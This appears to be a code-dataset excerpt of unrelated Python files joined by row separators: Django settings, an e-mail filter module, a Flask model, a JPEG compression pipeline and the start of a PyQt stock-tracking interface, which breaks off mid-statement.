"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient"
},
"KEY_PREFIX": "puzzlehunt"
}
}
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
HUEY = {
'connection': {
'host': 'redis',
},
'consumer': {
'workers': 2,
},
}
WSGI_APPLICATION = 'puzzlehunt_server.wsgi.application'
# URL settings
LOGIN_REDIRECT_URL = '/'
PROTECTED_URL = '/protected/'
LOGIN_URL = 'huntserver:login_selection'
# Random settings
SILENCED_SYSTEM_CHECKS = ["urls.W005"] # silences admin url override warning
CRISPY_TEMPLATE_PACK = 'bootstrap3'
DEBUG_TOOLBAR_PATCH_SETTINGS = False
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
DEFAULT_HINT_LOCKOUT = 60 # 60 Minutes
HUNT_REGISTRATION_LOCKOUT = 2 # 2 Days
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/New_York'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static/Media files settings
STATIC_ROOT = "/static/"
STATIC_URL = '/static/'
MEDIA_ROOT = "/media/"
MEDIA_URL = '/media/'
# Shibboleth settings
USE_SHIBBOLETH = os.getenv("DJANGO_USE_SHIBBOLETH", default="False").lower() == "true"
SHIB_DOMAIN = os.getenv("DOMAIN", default="")
SHIB_ATTRIBUTE_MAP = {
"Shib-Identity-Provider": (True, "idp"),
"eppn": (True, "eppn"),
"givenName": (False, "givenName"),
"sn": (False, "sn")
}
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'INFO',
'class': 'logging.FileHandler',
'filename': '/var/log/external/django.log',
'formatter': 'verbose',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': True,
},
'huntserver': {
'handlers': ['file'],
'level': 'INFO',
'propagate': True,
},
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(message)s'
},
},
}
# Email settings
CONTACT_EMAIL = 'puzzlehunt-staff@lists.andrew.cmu.edu'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
# Environment variable overrides
if os.environ.get("ENABLE_DEBUG_EMAIL"):
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
EMAIL_FILE_PATH = '/tmp/test_folder'
if os.environ.get("ENABLE_DEBUG_TOOLBAR"):
INSTALLED_APPS = INSTALLED_APPS + ('debug_toolbar',)
MIDDLEWARE = ('debug_toolbar.middleware.DebugToolbarMiddleware',) + MIDDLEWARE
if os.environ.get("SENTRY_DSN"):
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
sentry_sdk.init(
dsn=os.environ.get("SENTRY_DSN"),
integrations=[DjangoIntegration()],
# Sends which user caused the error
send_default_pii=True
)
|
999,317 | 3db2a6cc3bfb29752ac0022a10365ede8a64faa6 | """Filter that is applied on e-mail messages."""
import functools
import logging
import operator
import re
import typing as t
from .message import Message
from .connection import Connection
from .filter_actions import mark, move
_LOG = logging.getLogger(__name__)
CONDITION_OPERATORS = {
# '>': lambda arg: functools.partial(),
'=': lambda arg: functools.partial(operator.eq, arg),
# '!=': lambda a, b: a != b,
'=~': lambda arg: re.compile(arg).fullmatch,
    '~<': lambda arg: lambda variable: variable.startswith(arg),
'~': lambda arg: functools.partial(operator.contains, b=arg),
# '~!': lambda a, b: a not in b,
    '~~': lambda arg: re.compile(arg).search,
'~>': lambda arg: lambda variable: variable.endswith(arg),
}
"""Define a mapping: str -> t.Callable[[str], t.Callable[[str], bool]].
In such mapping:
- key is a 1- or 2-character string representation of a predicate on string variable; and
- value is a 1-argument function that creates another 1-argument function (the predicate itself).
Every operator is meant to create and return one-argument function that applies a predicate
on its argument.
"""
ACTIONS = {
'mark': mark,
'move': move,
'copy': lambda message, imap_daemon, folder: imap_daemon.copy_message(message, folder),
'delete': None,
'reply': None,
'forward': lambda message, smtp_daemon, address: smtp_daemon.forward_message(message, address)}
"""Define a mapping: str -> t.Callable[[Message], None].
In such mapping:
- key is a string representation of an operation on Message instance; and
- value is a function which takes Message instance and possibly other arguments, and executes
said operation.
Every action is a callable that performs an operation
involving a Message and possibly other entities.
"""
FILTER_CODE = 'lambda message: {}'
class MessageFilter:
"""For selective actions on messages."""
@classmethod
def from_dict(cls, data: dict,
named_connections: t.Mapping[str, Connection] = {}) -> 'MessageFilter':
try:
connection_names = data['connections']
except KeyError:
connection_names = []
connections = []
for connection_name in connection_names:
connections.append(named_connections[connection_name])
condition = eval(FILTER_CODE.format(data['condition']))
try:
action_strings = data['actions']
except KeyError:
action_strings = []
actions = []
for action_string in action_strings:
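            # an action string has the form "<operation>:<args>", e.g. "mark:read" or "move:work/Archive" (illustrative values)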
_LOG.debug('parsing action: %s', action_string)
operation, _, raw_args = action_string.partition(':')
try:
action = ACTIONS[operation]
except KeyError:
_LOG.exception('action "%s" consists of invalid operation "%s"',
action_string, operation)
raise RuntimeError('cannot construct the filter with invalid action')
if action is move:
connection, _, folder = raw_args.partition('/')
args = (named_connections[connection], folder)
elif action is mark:
args = (raw_args,)
else:
raise NotImplementedError(
f'parsing args "{raw_args}" for action "{operation}" is not implemented yet')
_LOG.debug('parsed to operation %s (mapped to action %s), args: %s',
operation, action, args)
actions.append((action, args))
return cls(connections, condition, actions)
def __init__(
self, connections: t.List[Connection],
condition: t.List[t.List[t.Tuple[str, t.Callable[[str], bool]]]],
actions: t.List[t.Tuple[t.Callable[[t.Any], None], t.Sequence[t.Any]]]):
self._connections = connections
self._condition = condition
self._actions = actions
def applies_to(self, message: Message) -> bool:
try:
return self._condition(message)
        except Exception:
_LOG.exception('filter %s failed on message %s', self, message)
return False
def apply_unconditionally(self, message: Message):
"""Apply actions of this filter to the given message ignoring the conditions."""
for action, args in self._actions:
if action not in {move, mark}:
raise RuntimeError('refusing to execute untested action')
if action is mark:
args = (message._origin_server, *args)
action(message, *args)
def apply_to(self, message: Message):
"""Apply filter on the message if it satisfies the filter conditions."""
if self.applies_to(message):
self.apply_unconditionally(message)
def __str__(self):
return str({
'connections': self._connections,
'condition': self._condition,
'actions': [
'{}(message, {})'.format(action.__name__, ', '.join([str(arg) for arg in args]))
for action, args in self._actions]})
|
999,318 | 8707a4c5ba93bd364c57f5ebd6b8082f1700f772 | '''
Main Vagrant Provider class
'''
from ..provider import Provider
class VagrantProvider(Provider):
'''
Vagrant Provider
'''
def __init__(self, config):
super(VagrantProvider, self).__init__()
self.config = config
|
999,319 | 21d26fafc62882032c2245930472d2c77c92f818 | from market import db
class Item(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(length=30), nullable=False, unique=True)
price = db.Column(db.Integer, nullable=False)
barcode = db.Column(db.String(length=12), nullable=False, unique=True)
description = db.Column(db.String(length=1024), nullable=False, unique=True)
owner = db.Column(db.Integer, db.ForeignKey('user.id'))
def assign_ownership(self, user):
self.owner = user.id
user.budget -= self.price
db.session.commit()
def remove_ownership(self, user):
self.owner = None
user.budget += self.price
db.session.commit()
def __repr__(self):
return f'Item {self.name}'
|
999,320 | ac213834b2eb1526171161298a454c9dd63e59dd | #!/usr/bin/python3
"""This is module 5-base_geometry"""
class BaseGeometry:
"""empty class BaseGeometry"""
pass
|
999,321 | d2b4ec49da3c7a24272bec2153a2740c059a7b62 | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from Constants import *
from HuffmanDecoding import HuffmanDecoding
from HuffmanEncoding import HuffmanEncoding
from JPEGHelpers import *
from HuffmanTree import HuffmanTree  # imported as a class since it is called directly below (assumes the class shares the module name)
from joblib import Parallel, delayed
def step1_LoadImage(debugFlag, imagePath):
print("Step 1 Loading Image", imagePath)
img = Image.open(imagePath)
imageArray = np.array(img) # 640x480x4 array
if debugFlag:
print(imageArray.shape)
plt.imshow(imageArray)
plt.show()
return imageArray
def step2_ConvertRGBToYCbCr(debugFlag, rgbChannels):
print("Step 2 Converting to YCbCr")
height = rgbChannels.shape[0]
width = rgbChannels.shape[1]
yCbCrPicture = np.zeros((height, width, 3))
# FOR EACH RGB-PIXEL
    for row in range(height):
        for col in range(width):
            # stack the pixel's R, G, B values into a 3x1 column vector
            rgbVector = [
                [rgbChannels[row, col, 0]],  # RED value of the current pixel
                [rgbChannels[row, col, 1]],  # GREEN value of the current pixel
                [rgbChannels[row, col, 2]],  # BLUE value of the current pixel
            ]
            ypbpr = np.matrix(MultiplicationMatrixYCbCr) * rgbVector
            ycbcr = np.matrix(ypbpr) + AdditionMatrixYCbCr
            yCbCrPicture[row, col, 0] = ycbcr[0, 0]  # Y
            yCbCrPicture[row, col, 1] = ycbcr[1, 0]  # Cb
            yCbCrPicture[row, col, 2] = ycbcr[2, 0]  # Cr
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(yCbCrPicture[:, :, 0])
axarr[0].set_title('For Y')
axarr[1].imshow(yCbCrPicture[:, :, 1])
axarr[1].set_title('For Cb')
axarr[2].imshow(yCbCrPicture[:, :, 2])
axarr[2].set_title('For Cr')
plt.show()
return yCbCrPicture
def step3_SubSample(debugFlag, yCbCrChannels, sampleOverX: int, sampleOverY: int):
print("Step 3 Subsample")
height = yCbCrChannels.shape[0]
width = yCbCrChannels.shape[1]
result = None
found = False
# 4 Different Modes for Sub-Sample
if sampleOverX == 1 and sampleOverY == 1:
result = Subsampling_TYPE_4_1_1(yCbCrChannels, height, width)
found = True
if sampleOverX == 2 and sampleOverY == 0:
result = Subsampling_TYPE_4_2_0(yCbCrChannels, height, width)
found = True
if sampleOverX == 2 and sampleOverY == 2:
result = Subsampling_TYPE_4_2_2(yCbCrChannels, height, width)
found = True
if sampleOverX == 4 and sampleOverY == 4:
result = Subsampling_TYPE_4_4_4(yCbCrChannels, height, width)
found = True
if found:
result = [yCbCrChannels[:, :, 0], result[:, :, 1], result[:, :, 2]]
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(result[0])
axarr[0].set_title('For Y')
axarr[1].imshow(result[1])
axarr[1].set_title('For Cb')
axarr[2].imshow(result[2])
axarr[2].set_title('For Cr')
plt.show()
return result
else:
raise ValueError("Wrong sample type")
# channelCb = np.zeros([int(height / sampleOverY), int(width / sampleOverX)])
# channelCr = np.zeros([int(height / sampleOverY), int(width / sampleOverX)])
# for x in range(0, width, sampleOverX):
# for y in range(0, height, sampleOverY):
# channelCb[int(y / sampleOverY), int(x / sampleOverX)] = arithmeticMean(yCbCrChannels, x, y, 1, sampleOverX,
# sampleOverY)
# channelCr[int(y / sampleOverY), int(x / sampleOverX)] = arithmeticMean(yCbCrChannels, x, y, 2, sampleOverX,
# sampleOverY)
# if debugFlag:
# plt.imshow(channelY)
# plt.xlabel('For Y AFTER')
# plt.set_cmap('gray')
# plt.show()
#
# plt.imshow(channelCb)
# plt.xlabel('For Cb')
# plt.set_cmap('gray')
# plt.show()
#
# plt.imshow(channelCr)
# plt.xlabel('For Cr')
# plt.set_cmap('gray')
# plt.show()
def step4_DCTAllChannels(debugFlag, yCbCrChannels):
print("Step 4 DCT Channels")
dctY, dctCb, dctCr = Parallel(n_jobs=3)(delayed(ChannelDCT)(yCbCrChannels[i]) for i in range(3))
# dctY = ChannelDCT(yCbCrChannels[0])
# print(" DCT Channel Y")
# dctCb = ChannelDCT(yCbCrChannels[1])
# print(" DCT Channel Cb")
# dctCr = ChannelDCT(yCbCrChannels[2])
# print(" DCT Channel Cr")
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(dctY)
axarr[0].set_title('For Y')
axarr[1].imshow(dctCb)
axarr[1].set_title('For Cb')
axarr[2].imshow(dctCr)
axarr[2].set_title('For Cr')
plt.show()
return [dctY, dctCb, dctCr]
def step5_Quantization(debugFlag, yCbCrChannels):
print("Step 5a Quantization")
quantY = ChannelQuantization(yCbCrChannels[0], const.Q50, "layerY")
quantCb = ChannelQuantization(yCbCrChannels[1], const.Q50, "layerCb")
quantCr = ChannelQuantization(yCbCrChannels[2], const.Q50, "layerCr")
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(quantY)
axarr[0].set_title('For Y')
axarr[1].imshow(quantCb)
axarr[1].set_title('For Cb')
axarr[2].imshow(quantCr)
axarr[2].set_title('For Cr')
plt.show()
return [quantY, quantCb, quantCr]
def step5_DifferentalEncoding(debugFlag, yCbCrChannels):
print("Step 5b DifferentalEncoding")
dfY = ChannelDifferentialEncoding(yCbCrChannels[0])
dfCb = ChannelDifferentialEncoding(yCbCrChannels[1])
dfCr = ChannelDifferentialEncoding(yCbCrChannels[2])
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(dfY)
axarr[0].set_title('For Y')
axarr[1].imshow(dfCb)
axarr[1].set_title('For Cb')
axarr[2].imshow(dfCr)
axarr[2].set_title('For Cr')
plt.show()
return [dfY, dfCb, dfCr]
def step6_ZickZack(debugFlag, yCbCrChannels):
print("Step 6 ZickZack")
zickZackY = ChannelZickZack(yCbCrChannels[0])
zickZackCb = ChannelZickZack(yCbCrChannels[1])
zickZackCr = ChannelZickZack(yCbCrChannels[2])
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].hist(zickZackY)
axarr[0].set_title('For Y')
axarr[1].hist(zickZackCb)
axarr[1].set_title('For Cb')
axarr[2].hist(zickZackCr)
axarr[2].set_title('For Cr')
plt.show()
return [zickZackY, zickZackCb, zickZackCr]
def step7_LengthEncode(debugFlag, yCbCrChannels):
print("Step 7 LenghtEncode")
lengthEncodeY = ChannelLengthEncode(yCbCrChannels[0])
lengthEncodeCb = ChannelLengthEncode(yCbCrChannels[1])
lengthEncodeCr = ChannelLengthEncode(yCbCrChannels[2])
return [lengthEncodeY, lengthEncodeCb, lengthEncodeCr]
def step8_HuffmanEncode(debugFlag, yCbCrChannels, zicks):
print("Step 8 HuffmanEncode")
huffmanTreeAcCx = HuffmanTree(const.StdACChrominanceLengths, const.StdACChrominanceValues)
huffmanTreeDcCx = HuffmanTree(const.StdDCChrominanceLengths, const.StdDCChrominanceValues)
huffmanTreeAcY = HuffmanTree(const.StdACLuminanceLengths, const.StdACLuminanceValues)
huffmanTreeDcY = HuffmanTree(const.StdDCLuminanceLengths, const.StdDCLuminanceValues)
huffmanEncodeY = HuffmanEncoding(zicks[0], huffmanTreeAcY, huffmanTreeDcY)
huffmanEncodeCb = HuffmanEncoding(zicks[1], huffmanTreeAcCx, huffmanTreeDcCx)
huffmanEncodeCr = HuffmanEncoding(zicks[2], huffmanTreeAcCx, huffmanTreeDcCx)
return [huffmanEncodeY.result, huffmanEncodeCb.result, huffmanEncodeCr.result]
def step9_HuffmanDecode(debugFlag, yCbCrChannels, blockCount):
print("Step 9 HuffmanDecode")
huffmanTreeAcCx = HuffmanTree(const.StdACChrominanceLengths, const.StdACChrominanceValues)
huffmanTreeDcCx = HuffmanTree(const.StdDCChrominanceLengths, const.StdDCChrominanceValues)
huffmanTreeAcY = HuffmanTree(const.StdACLuminanceLengths, const.StdACLuminanceValues)
huffmanTreeDcY = HuffmanTree(const.StdDCLuminanceLengths, const.StdDCLuminanceValues)
huffmanDecoding_Y = HuffmanDecoding(yCbCrChannels[0], blockCount, huffmanTreeAcY, huffmanTreeDcY)
huffmanDecoding_Cb = HuffmanDecoding(yCbCrChannels[1], blockCount, huffmanTreeAcCx, huffmanTreeDcCx)
huffmanDecoding_Cr = HuffmanDecoding(yCbCrChannels[2], blockCount, huffmanTreeAcCx, huffmanTreeDcCx)
return [huffmanDecoding_Y.result, huffmanDecoding_Cb.result, huffmanDecoding_Cr.result]
def step10_LengthDecode(debugFlag, yCbCrChannels, blockCount):
print("Step 10 Length Decode")
runlengthDecode_Y = ChannelRunlengthDecode(yCbCrChannels[0], blockCount)
runlengthDecode_Cb = ChannelRunlengthDecode(yCbCrChannels[1], blockCount)
runlengthDecode_Cr = ChannelRunlengthDecode(yCbCrChannels[2], blockCount)
return [runlengthDecode_Y, runlengthDecode_Cb, runlengthDecode_Cr]
def step11_InverseZickZack(debugFlag, yCbCrChannels, width, height, sampledSize):
print("Step 11 Inverse ZickZack")
zickZackY = ChannelInverseZickZack(yCbCrChannels[0], width, height)
print(" Inversed Channel Y")
zickZackCb = ChannelInverseZickZack(yCbCrChannels[1], sampledSize[0], sampledSize[1])
print(" Inversed Channel Cb")
zickZackCr = ChannelInverseZickZack(yCbCrChannels[2], sampledSize[0], sampledSize[1])
print(" Inversed Channel Cr")
return [zickZackY, zickZackCb, zickZackCr]
def step12_InverseDifferentalEncding(debugFlag, yCbCrChannels):
print("Step 12 Inverse Differential")
inverseDifferentalY = ChannelInverseDifferentialEncoding(yCbCrChannels[0])
inverseDifferentalCb = ChannelInverseDifferentialEncoding(yCbCrChannels[1])
inverseDifferentalCr = ChannelInverseDifferentialEncoding(yCbCrChannels[2])
return [inverseDifferentalY, inverseDifferentalCb, inverseDifferentalCr]
def step13_Dequantization(debugFlag, yCbCrChannels):
print("Step 13 Dequantization")
dequantizationY = ChannelDequantization(yCbCrChannels[0], const.Q50, "layerY")
print(" Dequan Channel Y")
dequantizationCb = ChannelDequantization(yCbCrChannels[1], const.Q50, "layerCb")
print(" Dequan Channel Cb")
dequantizationCr = ChannelDequantization(yCbCrChannels[2], const.Q50, "layerCr")
print(" Dequan Channel Cr")
return [dequantizationY, dequantizationCb, dequantizationCr]
def step14_Idct(debugFlag, yCbCrChannels):
print("Step 14 Idct")
labels = ["layerY", "layerCb", "layerCr"]
idctY, idctCb, idctCr = Parallel(n_jobs=3)(delayed(ChannelIdct)(yCbCrChannels[i], labels[i]) for i in range(3))
# idctY = ChannelIdct(yCbCrChannels[0], "layerY")
# idctCb = ChannelIdct(yCbCrChannels[1], "layerCb")
# idctCr = ChannelIdct(yCbCrChannels[2], "layerCr")
if debugFlag:
plt.imshow(idctY)
plt.xlabel('For Y AFTER')
plt.set_cmap('gray')
plt.show()
plt.imshow(idctCb)
plt.xlabel('For Cb')
plt.set_cmap('gray')
plt.show()
plt.imshow(idctCr)
plt.xlabel('For Cr')
plt.set_cmap('gray')
plt.show()
return [idctY, idctCb, idctCr]
def step15_ReverseSubsampling(debugFlag, yCbCrChannels, sampleOverX, sampleOverY):
print("Step 15 Reverse Subsampling")
result = np.zeros((len(yCbCrChannels[0]), len(yCbCrChannels[0][0]), 3))
result[:, :, 0] = np.asarray(yCbCrChannels[0])
found = False
if sampleOverX == 1 and sampleOverY == 1:
ReverseSubsampling_TYPE_4_1_1(yCbCrChannels, result)
found = True
if sampleOverX == 2 and sampleOverY == 0:
ReverseSubsampling_TYPE_4_2_0(yCbCrChannels, result)
found = True
if sampleOverX == 2 and sampleOverY == 2:
ReverseSubsampling_TYPE_4_2_2(yCbCrChannels, result)
found = True
if sampleOverX == 4 and sampleOverY == 4:
ReverseSubsampling_TYPE_4_4_4(yCbCrChannels, result)
found = True
if found:
if debugFlag:
plt.imshow(result[:, :, 0])
plt.xlabel('ReverseSubsampling For Y')
plt.set_cmap('gray')
plt.show()
plt.imshow(result[:, :, 1])
plt.xlabel('ReverseSubsampling For Cb')
plt.set_cmap('gray')
plt.show()
plt.imshow(result[:, :, 2])
plt.xlabel('ReverseSubsampling For Cr')
plt.set_cmap('gray')
plt.show()
return result
else:
raise ValueError("Wrong sample type")
def step16_ConvertYCbCrToRGB(debugFlag, yCbCrChannels, RGBMatrix, yPbPrMatrix):
print("Step 15 Convert back to RGB")
height = len(yCbCrChannels)
width = len(yCbCrChannels[0])
rgbPicture = np.zeros((width, height, 3))
# for each YCbCr pixel
for x in range(width):
for y in range(height):
# convert YCbCr to a single vector for calculating
yCbCrVector = np.asarray([[yCbCrChannels[x, y, 0]], [yCbCrChannels[x, y, 1]], [yCbCrChannels[x, y, 2]]])
yPbPr = minus(yCbCrVector, yPbPrMatrix)
rgb = mult(RGBMatrix, yPbPr)
# map and set RGB value from vector
rgbPicture[x][y][0] = mapit(rgb[0][0]) / 255.
rgbPicture[x][y][1] = mapit(rgb[1][0]) / 255.
rgbPicture[x][y][2] = mapit(rgb[2][0]) / 255.
return rgbPicture
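# A minimal sketch (not part of the original file) of the intended encode-side
# order of the step functions above; the file name and sampling factors are
# illustrative, and which intermediate step8 expects as `zicks` is an assumption.
#
# if __name__ == "__main__":
#     rgb = step1_LoadImage(False, "input.png")
#     ycbcr = step2_ConvertRGBToYCbCr(False, rgb)
#     sampled = step3_SubSample(False, ycbcr, 2, 2)          # 4:2:2 subsampling
#     dct = step4_DCTAllChannels(False, sampled)
#     quantized = step5_Quantization(False, dct)
#     diffed = step5_DifferentalEncoding(False, quantized)
#     zig = step6_ZickZack(False, diffed)
#     rle = step7_LengthEncode(False, zig)
#     bits = step8_HuffmanEncode(False, rle, rle)            # step8 only reads its third argument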
|
999,322 | 07ede699d51df3c547b96c9a4d8b62b229aee834 | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from session import Session
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
import yfinance as yf
import datetime
from functools import partial
import matplotlib
from dnn import Dnn
import time
font = {'family' : 'Calibri',
'size' : 10,
'weight' : 'bold'}
# Colours
ORANGE = 'rgb(255, 140, 0)'
GREY = 'rgb(64, 64, 64)'
LIGHT_ORANGE = 'rgb(255, 175, 64)'
WARM_RED = 'rgb(249, 66, 58)'
LIGHT_GREY = 'rgb(200, 200, 200)'
DARK_GREY = 'rgb(32, 32, 32)'
matplotlib.rc('font', **font)
matplotlib.rc('text', color='white')
matplotlib.rc('xtick', color='white')
matplotlib.rc('ytick', color='white')
matplotlib.rc('axes', facecolor='#404040')
matplotlib.rc('axes', grid=True)
matplotlib.rc('grid', alpha=0.5, linewidth=0.4)
class MainUi(QWidget):
"""Contains all widgets."""
def __init__(self, session=Session()):
super().__init__()
self.setWindowState(Qt.WindowMaximized)
sizeObject = QDesktopWidget().screenGeometry(-1)
self.screen_height = sizeObject.height()
self.screen_width = sizeObject.width()
self.session = session
self.stack = QStackedWidget(self)
self.stack.addWidget(LoginScreen(self))
self.stack.addWidget(MainScreen(self))
self.stack.addWidget(ViewMyStocksScreen(self))
self.stack.addWidget(SignupScreen(self))
hbox = QHBoxLayout(self)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.stack)
self.setLayout(hbox)
self.setWindowTitle('Fortune')
self.stack.setCurrentIndex(0)
self.setWindowIcon(QIcon('images/logo.png'))
self.show()
def show_window(self, i, widget):
self.stack.removeWidget(self.stack.widget(i))
self.stack.insertWidget(i, widget(self))
self.stack.setCurrentIndex(i)
class LoginScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.master_layout = QHBoxLayout()
self.master_layout.setContentsMargins(0, 0, 0, 0)
self.master_container = QWidget()
self.setStyleSheet(f'background-color: {DARK_GREY}')
vlayout = QVBoxLayout()
gbox = QGroupBox()
self.layout = QFormLayout()
self.layout.setContentsMargins(0.02*self.master.screen_width, 0.05*self.master.screen_width, 0.02*self.master.screen_width, 0.05*self.master.screen_width)
self.titlebar = QLabel('FORTUNE')
self.titlebar.setStyleSheet('QLabel {background: rgb(255, 140, 0); padding: 16px; color: white}')
font = Font(30)
self.titlebar.setFont(font)
self.username_e = QLineEdit()
self.username_e.setPlaceholderText("Username")
self.username_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e = QLineEdit()
self.password_e.setPlaceholderText("Password")
self.password_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e.setEchoMode(QLineEdit.Password)
self.login_b = Button("LOG IN", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.login_b.clicked.connect(lambda: self.login_clicked())
self.signup_b = Button("SIGN UP", GREY, 'white', GREY, GREY, 'white', GREY)
self.signup_b.clicked.connect(lambda: self.signup_clicked())
self.layout.addRow(self.username_e)
self.layout.addRow(self.password_e)
self.layout.addRow(self.login_b)
self.layout.addRow(self.signup_b)
gbox.setLayout(self.layout)
gbox.setStyleSheet('background-color: rgb(230, 230, 230)')
vlayout.addWidget(self.titlebar)
self.login_title_frame = QHBoxLayout()
self.login_title = QLabel('WELCOME')
self.login_title.setStyleSheet('QLabel {background: rgb(255, 140, 0); padding: 16px; color: white}')
font = Font(30)
self.login_title.setFont(font)
self.login_title_frame.addWidget(self.login_title)
self.login_title_frame.setContentsMargins(0.34*self.master.screen_width, 0.15*self.master.screen_height, 0.34*self.master.screen_width, 0)
vlayout.addLayout(self.login_title_frame)
lay = QHBoxLayout()
lay.addWidget(gbox)
lay.setContentsMargins(0.34*self.master.screen_width, 0, 0.34*self.master.screen_width, 0)
vlayout.addLayout(lay)
vlayout.setContentsMargins(0, 0, 0, 0)
vlayout.addStretch(1)
vlayout.setSpacing(0)
self.master_container.setLayout(vlayout)
self.master_layout.addWidget(self.master_container)
self.setLayout(self.master_layout)
def login_clicked(self):
is_valid, self.session = self.session.dbh.check_login(self.username_e.text(), self.password_e.text(), self.session)
if is_valid:
self.master.show_window(1, MainScreen)
else:
self.error_label = QLabel('Username or password is incorrect')
self.error_label.setStyleSheet('QLabel{background-color:'+WARM_RED+'; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.layout.insertRow(0, self.error_label)
self.username_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
self.password_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
def signup_clicked(self):
self.master.show_window(4, SignupScreen)
def keyPressEvent(self, event):
if event.key() == 16777220: # Enter key - 16777220
self.login_clicked()
elif event.key() == 16777237: # Down key - 16777237
self.password_e.setFocus()
elif event.key() == 16777235: # Up Key - 16777235
self.username_e.setFocus()
class SignupScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.main_layout = QVBoxLayout()
self.signup_form = QFormLayout()
self.signup_form.setContentsMargins(0.05*self.master.screen_width, 0.05*self.master.screen_width, 0.05*self.master.screen_width, 0.05*self.master.screen_width)
self.gbox = QGroupBox()
self.titlebar = QLabel('FORTUNE')
self.titlebar.setStyleSheet('QLabel {background: orange; padding: 16px; color: white}')
font = Font(30)
self.titlebar.setFont(font)
self.username_e = QLineEdit()
self.username_e.setPlaceholderText("Username")
self.username_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e = QLineEdit()
self.password_e.setPlaceholderText("Password")
self.password_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e.setEchoMode(QLineEdit.Password)
self.signup_b = Button("SIGN UP", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.signup_b.clicked.connect(lambda: self.signup_clicked())
self.signup_form.addRow(self.username_e)
self.signup_form.addRow(self.password_e)
self.signup_form.addRow(self.signup_b)
self.gbox.setLayout(self.signup_form)
self.gbox.setStyleSheet('background-color: rgb(230, 230, 230)')
self.main_layout.addWidget(self.titlebar)
self.lay = QHBoxLayout()
self.lay.addWidget(self.gbox)
self.lay.setContentsMargins(0.34*self.master.screen_width, 0.10*self.master.screen_width, 0.34*self.master.screen_width, 0)
self.main_layout.addLayout(self.lay)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
def signup_clicked(self):
if 7 < len(self.password_e.text()) < 24:
record = [self.username_e.text(), self.password_e.text()]
is_valid = self.session.dbh.add_user_to_db(record)
if is_valid:
self.master.show_window(0, LoginScreen)
else:
self.error_label = QLabel("Username is taken")
self.error_label.setStyleSheet('QLabel{background-color:'+WARM_RED+'; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.signup_form.insertRow(0, self.error_label)
else:
self.error_label = QLabel('Password has to have 8-24 characters')
self.error_label.setStyleSheet('QLabel{background-color:' + WARM_RED + '; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.signup_form.insertRow(0, self.error_label)
self.username_e.setStyleSheet(
'QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid ' + WARM_RED + '}')
self.password_e.setStyleSheet(
'QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid ' + WARM_RED + '}')
class MainScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.setStyleSheet(f'background-color: {DARK_GREY}')
self.main_layout = QVBoxLayout()
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.setSpacing(0)
menu_bar = Menubar(self)
self.time_buttons_gbox = QGroupBox()
self.time_buttons_gbox.setStyleSheet('QGroupBox {background-color:'+DARK_GREY+'; border: 0px}')
self.time_buttons_layout = QHBoxLayout()
self.time_buttons_gbox.setLayout(self.time_buttons_layout)
for x in ('1M', '3M', '1Y', '5Y', 'All'):
if self.session.timeperiod == x:
style = 'QPushButton{'
style += f'color:{LIGHT_ORANGE}; background-color:{DARK_GREY}; border: 0px; padding: 16px'
style += '}'
else:
style = 'QPushButton{'
style += f'color:{LIGHT_GREY}; background-color:{DARK_GREY}; border: 0px; padding: 16px'
style += '}'
style += 'QPushButton:Hover{'
